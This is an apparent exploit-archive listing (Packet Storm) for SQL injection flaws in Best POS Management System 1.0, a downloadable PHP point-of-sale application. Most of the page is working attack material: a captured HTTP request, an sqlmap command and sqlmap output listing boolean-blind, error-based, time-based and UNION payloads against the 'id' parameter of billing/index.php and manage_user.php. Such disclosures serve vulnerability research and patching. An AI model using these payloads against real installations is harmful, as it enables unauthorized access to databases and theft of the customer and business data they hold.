exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Best POS Management System 1.0 SQL Injection

Best POS Management System 1.0 SQL Injection
Posted Feb 17, 2023
Authored by Ahmed Ismail

Best POS Management System version 1.0 suffers from multiple remote SQL injection vulnerabilities.

tags | exploit, remote, vulnerability, sql injection
SHA-256 | a7acc7de5abd2e101dd0e5cabd1f51c6855082d6151c6540a217afade665b956

Best POS Management System 1.0 SQL Injection

Change Mirror Download
# Exploit Title: SQL Injection on Best pos Management System
# Google Dork: NA
# Date: 14/2/2023
# Exploit Author: Ahmed Ismail (@MrOz1l)
# Vendor Homepage:
https://www.sourcecodester.com/php/16127/best-pos-management-system-php.html
# Software Link:
https://www.sourcecodester.com/sites/default/files/download/mayuri_k/kruxton.zip
# Version: 1.0
# Tested on: Windows 11
# CVE : NA

```

GET /kruxton/billing/index.php?id=9 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)
Gecko/20100101 Firefox/109.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://localhost/kruxton/index.php?page=orders
Cookie: PHPSESSID=61ubuj4m01jk5tibc7banpldao
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

```


# Payload

GET parameter 'id' is vulnerable. Do you want to keep testing the
others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 58
HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=9 AND 4017=4017

Type: error-based
Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or
GROUP BY clause (FLOOR)
Payload: id=9 OR (SELECT 7313 FROM(SELECT
COUNT(*),CONCAT(0x7162767171,(SELECT
(ELT(7313=7313,1))),0x7178707671,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=9 AND (SELECT 5871 FROM (SELECT(SLEEP(5)))rwMY)

Type: UNION query
Title: Generic UNION query (NULL) - 6 columns
Payload: id=-9498 UNION ALL SELECT
NULL,NULL,NULL,NULL,CONCAT(0x7162767171,0x53586b446c4c75556d48544175547856636d696171464e624c6572736f55415246446a4b56777749,0x7178707671),NULL--
-
---
[19:33:33] [INFO] the back-end DBMS is MySQL
web application technology: PHP 8.0.25, Apache 2.4.54
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
```



----------------------------




# Exploit Title: SQL Injection on Best pos Management System
# Google Dork: NA
# Date: 17/2/2023
# Exploit Author: Ahmed Ismail (@MrOz1l)
# Vendor Homepage:
https://www.sourcecodester.com/php/16127/best-pos-management-system-php.html
# Software Link:
https://www.sourcecodester.com/sites/default/files/download/mayuri_k/kruxton.zip
# Version: 1.0
# Tested on: Windows 11
# CVE : NA


_________
python sqlmap.py -u "http://localhost/kruxton/manage_user.php?id=4*"
--dbms=mysql --level 3 --risk 3 --dbs --fresh-queries


URI parameter '#1*' is vulnerable. Do you want to keep testing the
others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 52
HTTP(s) requests:
---
Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: http://localhost:80/kruxton/manage_user.php?id=4
<http://localhost/kruxton/manage_user.php?id=4> AND 6332=6332

Type: error-based
Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or
GROUP BY clause (FLOOR)
Payload: http://localhost:80/kruxton/manage_user.php?id=4
<http://localhost/kruxton/manage_user.php?id=4> OR (SELECT 6586
FROM(SELECT COUNT(*),CONCAT(0x716a6b6a71,(SELECT
(ELT(6586=6586,1))),0x7170787871,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: http://localhost:80/kruxton/manage_user.php?id=4
<http://localhost/kruxton/manage_user.php?id=4> AND (SELECT 3605 FROM
(SELECT(SLEEP(5)))zHgC)

Type: UNION query
Title: Generic UNION query (NULL) - 5 columns
Payload: http://localhost:80/kruxton/manage_user.php?id=-1830
<http://localhost/kruxton/manage_user.php?id=-1830> UNION ALL SELECT
NULL,NULL,CONCAT(0x716a6b6a71,0x4b5276534542756c4e596a4f7377506a73517a73544b4e44737946636674736c526c775277594976,0x7170787871),NULL,NULL--
-
---
[10:58:18] [INFO] the back-end DBMS is MySQL
web application technology: PHP, Apache 2.4.54, PHP 8.0.25
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
Login or Register to add favorites

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    17 Files
  • 3
    Sep 3rd
    38 Files
  • 4
    Sep 4th
    52 Files
  • 5
    Sep 5th
    23 Files
  • 6
    Sep 6th
    27 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    1 Files
  • 9
    Sep 9th
    16 Files
  • 10
    Sep 10th
    38 Files
  • 11
    Sep 11th
    21 Files
  • 12
    Sep 12th
    35 Files
  • 13
    Sep 13th
    0 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    0 Files
  • 17
    Sep 17th
    0 Files
  • 18
    Sep 18th
    0 Files
  • 19
    Sep 19th
    0 Files
  • 20
    Sep 20th
    0 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close